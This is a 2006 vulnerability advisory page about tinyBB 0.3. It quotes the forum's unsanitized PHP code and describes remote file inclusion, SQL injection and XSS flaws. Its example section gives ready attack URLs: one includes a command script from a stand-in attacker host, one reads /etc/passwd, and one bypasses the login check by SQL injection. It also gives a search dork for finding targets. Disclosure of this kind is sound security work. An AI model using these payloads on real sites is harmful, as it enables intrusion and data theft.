|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1011 CVE : CVE-2006-2741 CVE : CVE-2006-2740 CVE : CVE-2006-2739 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Mustafa Can Bjorn IPEKCI (nukedx nukedx com) Published : 03.06.2006
Advisory Content : --Security Report-- Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 27/05/06 05:37 AM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: Epicdesigns (http://www.epicdesigns.co.uk/) Version: 0.3 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to tinyBB.tinybb_footers variable in footers.php did not sanitized before using it.You can find vulnerable code in footers.php at line 3 -Source in footers.php- 3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); } -End of source- Fixing this vulnerability so easy turn off register_globals. There is also SQL injection in forgot.php.Parameter $q did not sanitized properly before using it on SQL query. You can find vulnerable codes in forgot.php at lines 3-18. -Source in forgot.php- 3: if (isset($q)) { 4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR email='$q'"; 5: $count = mysql_result(mysql_query($sql),0); ..... -End of source- Also this can be caused to XSS.You can find vulnerable code in forgot.php at line 19-21 -Source in forgot.php- 19: else { 20: echo "<p>The query <b>$q</b> could not be ..... 21: } -End of source- There is another SQL injection in login.php.Parameters username and password did not sanitized properly before using it on SQL query.You can find vulnerable codes in login.php at line 2-8 -Source in login.php- 8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND username='$username' AND password='$password'"; -End of source- I didnt wrote all vulnerabilities on tinyBB there is too many SQL injections and XSS vulnerabilities on this tiny bulletin board. Level: Highly Critical --- How&Example: Succesful exploitation needs allow_url_fopen set to 1 and register_globals on GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com /cmd.txt? If magic_quotes_gpc off remote attacker can include local files too EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00 SQL injection on login.php GET -> http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*& password=nothing --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=33 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=33 --- Dorks: "Powered by tinyBB"  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |